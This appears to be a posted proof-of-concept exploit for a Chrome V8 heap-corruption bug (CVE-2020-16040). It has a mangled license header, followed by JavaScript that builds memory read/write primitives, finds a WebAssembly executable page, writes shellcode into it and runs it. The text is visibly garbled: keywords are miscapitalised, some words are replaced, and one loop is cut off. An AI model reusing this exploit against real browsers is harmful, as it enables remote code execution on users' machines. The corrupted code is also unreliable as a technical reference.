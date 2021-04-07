



# Exploit Title: Google Chrome 86.0.4240 V8-Remote Code Execution # Exploit Creator: r4j0x00 # Version: <87.0.4280.88 # Description: Due to insufficient data validation on Google Chrome V8 prior to 87.0.4280.88 A remote attacker could exploit the heap Corruption via a crafted HTML page. # CVE: CVE-2020-16040 / * BSD 2-Clause License Copyright (c) 2021, rajvardhan agarwal All rights reserved. Redistribution and use in source and binary format is permitted, with or without changes, if the following conditions are met: 1. Redistribution of source code must retain the above copyright notice, a list of these terms, and the following disclaimer: 2. For redistribution in binary format, the above copyright notice, the list of terms and conditions, and the following disclaimer must be duplicated in the documentation and other materials that accompany the distribution. This software is provided "as is" by copyright owners and contributors, and any express or implied warranties, including, but not limited to, implied warranties of merchantability and fitness for a particular purpose are disclaimed. I will. In any case, the copyright owner or contributor shall be responsible for direct, indirect, incidental, special, exemplary, or consequential damages, including loss of procurement, use, data, or profit of alternative goods or services. Is not responsible for (but not limited to). Or business interruption) However, regardless of contract, strict liability, or tort (including negligence or otherwise), it arises from the use of this software based on the theory of liability that arises in any way from the use of this software. It is a thing. * / // Reference: https: //faraz.faith/2021-01-07-cve-2020-16040-analysis/ var wasm_code = new Uint8Array ([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]) Var wasm_mod = new WebAssembly.Module (wasm_code); var wasm_instance = new WebAssembly.Instance (wasm_mod); var f = wasm_instance.exports.main; var buf = new ArrayBuffer (8); var f64_buf = new Float64Array (buf); var u64_buf = new Uint32Array (buf); buf2 = new ArrayBuffer (0x150) ;. Function ftoi (val) {f64_buf[0] = val; BigInt (returns u64_buf)[0]) + (BigInt (u64_buf)[1])< 32n); }function itof(val) { u64_buf[0] = Number(val & 0xffffffffn); u64_buf[1] = Number(val >> 32n); returns f64_buf[0];} function foo (a) {var y = 0x7fffffff; if (a == NaN) y = NaN; if (a) y = -1; z = y +1. z >> = 31; z = 0x80000000-Math.sign (z | 1); if (a) z = 0; var arr = new Array (0-Math.sign (z)); arr.shift (); var cor = [1.1, 1.2, 1.3]; Return [arr, cor];} for (var i = 0; i <0x3000; ++ i) foo (true); var x = foo (false); var arr = x[0]var cor = x[1]; const idx = 6; arr[idx+10] = 0x4242; Function addrof (k) {arr[idx+1] = k; returns ftoi (cor[0]) & 0xffffffffn;} Function fakeobj (k) {cor[0] = itof (k); returns arrival[idx+1];} var float_array_map = ftoi (cor[3]); var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4]var fake = fakeobj (addrof (arr2) + 0x20n); function arbread (addr) {if (addr% 2n == 0) {addr + = 1n;} arr2[1] = itof ((2n << 32n) + addr-8n); Back (Fake)[0]);} function arbwrite (addr, val) {if (addr% 2n == 0) {addr + = 1n;} arr2[1] = itof ((2n << 32n) + addr-8n); False[0] = itof (BigInt (val));} function copy_shellcode (addr, shellcode) {let dataview = new DataView (buf2); buf_addr = addrof (buf2); backing_store_addr = buf_addr + 0x14n; arbwrite (backing_store_addr, addr); for (let) i = 0; i[i], True);}} var rwx_page_addr = ftoi (arbread (addrof (wasm_instance) + 0x68n)); console.log ("[+] rwx page address: "+ rwx_page_addr.toString (16)); var shellcode = [16889928,16843009,1213202689,1652108984,23227744,70338561,800606244,796029813,1349413218,1760004424,16855099,19149953,1208025345,1397310648,1497451600,3526447165,1510500946,1390543176,1222805832,16843192,16843009,3091746817,1617066286,16867949,604254536,1966061640,1647276659,827354729,141186806,3858843742,3867756630,257440618,2425393157]; / * var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957]; * / // Windows shellcode copy_shellcode (rwx_page_addr, shellcode); f ();



